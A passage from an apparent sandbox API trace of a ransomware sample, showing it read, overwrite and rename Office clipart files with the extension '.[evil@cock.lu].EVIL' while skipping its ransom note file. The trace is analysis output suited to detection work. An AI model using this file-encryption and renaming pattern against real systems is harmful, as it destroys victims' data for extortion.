_String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.882] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0239951.WMF") returned 0x0 [0152.882] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239951.WMF") returned 0x45 [0152.882] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239951.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239951.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.884] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1c40, lpOverlapped=0x0) returned 1 [0152.890] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.890] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.890] _errno () returned 0x84b1160840 [0152.891] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.891] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x1c60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1c60, lpOverlapped=0x0) returned 1 [0152.891] CloseHandle (hObject=0x1a8) returned 1 [0152.891] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239951.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.891] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.891] __uncaught_exception () returned 0x84b1160800 [0152.891] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.891] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239951.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239951.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239951.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239951.wmf.[evil@cock.lu].evil")) returned 1 [0152.892] ??_V@YAXPEAX@Z () returned 0x1 [0152.895] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239951.WMF", dwFileAttributes=0x200) returned 0 [0152.895] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.895] wcsstr (_Str="J0239953.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.895] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239953.WMF") returned 69 [0152.895] wcscmp (_String1="J0239953.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.895] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0239953.WMF") returned 0x0 [0152.895] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239953.WMF") returned 0x45 [0152.895] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239953.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239953.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.897] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1bc8, lpOverlapped=0x0) returned 1 [0152.904] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.904] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.904] _errno () returned 0x84b1160840 [0152.904] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.904] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1be0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1be0, lpOverlapped=0x0) returned 1 [0152.904] CloseHandle (hObject=0x1a8) returned 1 [0152.904] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239953.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.904] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.904] __uncaught_exception () returned 0x84b1160800 [0152.904] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.905] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239953.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239953.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239953.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239953.wmf.[evil@cock.lu].evil")) returned 1 [0152.905] ??_V@YAXPEAX@Z () returned 0x1 [0152.908] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239953.WMF", dwFileAttributes=0x200) returned 0 [0152.908] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.908] wcsstr (_Str="J0239955.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.908] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239955.WMF") returned 69 [0152.908] wcscmp (_String1="J0239955.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.908] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0239955.WMF") returned 0x0 [0152.908] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239955.WMF") returned 0x45 [0152.908] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239955.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239955.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.910] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1348, lpOverlapped=0x0) returned 1 [0152.917] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.917] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.917] _errno () returned 0x84b1160840 [0152.917] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.917] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1360, lpOverlapped=0x0) returned 1 [0152.917] CloseHandle (hObject=0x1a8) returned 1 [0152.917] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239955.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.918] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.918] __uncaught_exception () returned 0x84b1160800 [0152.918] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.918] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239955.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239955.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239955.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239955.wmf.[evil@cock.lu].evil")) returned 1 [0152.919] ??_V@YAXPEAX@Z () returned 0x1 [0152.922] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239955.WMF", dwFileAttributes=0x200) returned 0 [0152.923] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.923] wcsstr (_Str="J0239965.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.923] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239965.WMF") returned 69 [0152.923] wcscmp (_String1="J0239965.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.923] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0239965.WMF") returned 0x0 [0152.923] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239965.WMF") returned 0x45 [0152.923] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239965.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239965.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.925] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1720, lpOverlapped=0x0) returned 1 [0152.934] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.934] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.934] _errno () returned 0x84b1160840 [0152.934] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.934] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1740, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1740, lpOverlapped=0x0) returned 1 [0152.934] CloseHandle (hObject=0x1a8) returned 1 [0152.934] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239965.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.934] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.934] __uncaught_exception () returned 0x84b1160800 [0152.934] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.935] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239965.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239965.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239965.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239965.wmf.[evil@cock.lu].evil")) returned 1 [0152.936] ??_V@YAXPEAX@Z () returned 0x1 [0152.939] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239965.WMF", dwFileAttributes=0x200) returned 0 [0152.939] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.939] wcsstr (_Str="J0239967.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.939] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239967.WMF") returned 69 [0152.939] wcscmp (_String1="J0239967.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.939] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0239967.WMF") returned 0x0 [0152.939] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239967.WMF") returned 0x45 [0152.940] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239967.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239967.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.942] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x154c, lpOverlapped=0x0) returned 1 [0152.949] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.949] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.949] _errno () returned 0x84b1160840 [0152.949] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.949] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1560, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1560, lpOverlapped=0x0) returned 1 [0152.949] CloseHandle (hObject=0x1a8) returned 1 [0152.949] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239967.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.949] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.949] __uncaught_exception () returned 0x84b1160800 [0152.949] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.950] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239967.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239967.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239967.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239967.wmf.[evil@cock.lu].evil")) returned 1 [0152.951] ??_V@YAXPEAX@Z () returned 0x1 [0152.954] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239967.WMF", dwFileAttributes=0x200) returned 0 [0152.954] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.954] wcsstr (_Str="J0239973.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.954] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239973.WMF") returned 69 [0152.954] wcscmp (_String1="J0239973.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.954] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0239973.WMF") returned 0x0 [0152.954] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239973.WMF") returned 0x45 [0152.954] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239973.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239973.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.957] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x13e8, lpOverlapped=0x0) returned 1 [0152.965] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.965] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.965] _errno () returned 0x84b1160840 [0152.965] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.965] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1400, lpOverlapped=0x0) returned 1 [0152.965] CloseHandle (hObject=0x1a8) returned 1 [0152.966] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239973.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.966] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.966] __uncaught_exception () returned 0x84b1160800 [0152.966] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.966] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239973.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239973.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239973.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239973.wmf.[evil@cock.lu].evil")) returned 1 [0152.967] ??_V@YAXPEAX@Z () returned 0x1 [0152.970] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239973.WMF", dwFileAttributes=0x200) returned 0 [0152.971] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.971] wcsstr (_Str="J0239975.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.971] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239975.WMF") returned 69 [0152.971] wcscmp (_String1="J0239975.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.971] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0239975.WMF") returned 0x0 [0152.971] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239975.WMF") returned 0x45 [0152.971] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239975.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239975.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.974] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xda0, lpOverlapped=0x0) returned 1 [0152.983] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.983] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.983] _errno () returned 0x84b1160840 [0152.983] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.983] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xdc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xdc0, lpOverlapped=0x0) returned 1 [0152.983] CloseHandle (hObject=0x1a8) returned 1 [0152.983] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239975.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.984] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.984] __uncaught_exception () returned 0x84b1160800 [0152.984] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.984] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239975.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239975.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239975.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239975.wmf.[evil@cock.lu].evil")) returned 1 [0152.985] ??_V@YAXPEAX@Z () returned 0x1 [0152.988] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239975.WMF", dwFileAttributes=0x200) returned 0 [0152.988] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.988] wcsstr (_Str="J0239997.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.988] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239997.WMF") returned 69 [0152.988] wcscmp (_String1="J0239997.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.988] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0239997.WMF") returned 0x0 [0152.988] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239997.WMF") returned 0x45 [0152.988] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239997.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239997.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.991] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xcd8, lpOverlapped=0x0) returned 1 [0152.997] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.997] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.997] _errno () returned 0x84b1160840 [0152.997] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.997] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xce0, lpOverlapped=0x0) returned 1 [0152.998] CloseHandle (hObject=0x1a8) returned 1 [0152.998] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239997.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.998] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.998] __uncaught_exception () returned 0x84b1160800 [0152.998] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.998] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239997.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239997.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239997.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239997.wmf.[evil@cock.lu].evil")) returned 1 [0152.999] ??_V@YAXPEAX@Z () returned 0x1 [0153.003] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239997.WMF", dwFileAttributes=0x200) returned 0 [0153.003] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.003] wcsstr (_Str="J0240157.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.003] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240157.WMF") returned 69 [0153.003] wcscmp (_String1="J0240157.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.003] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0240157.WMF") returned 0x0 [0153.003] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240157.WMF") returned 0x45 [0153.003] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240157.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240157.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 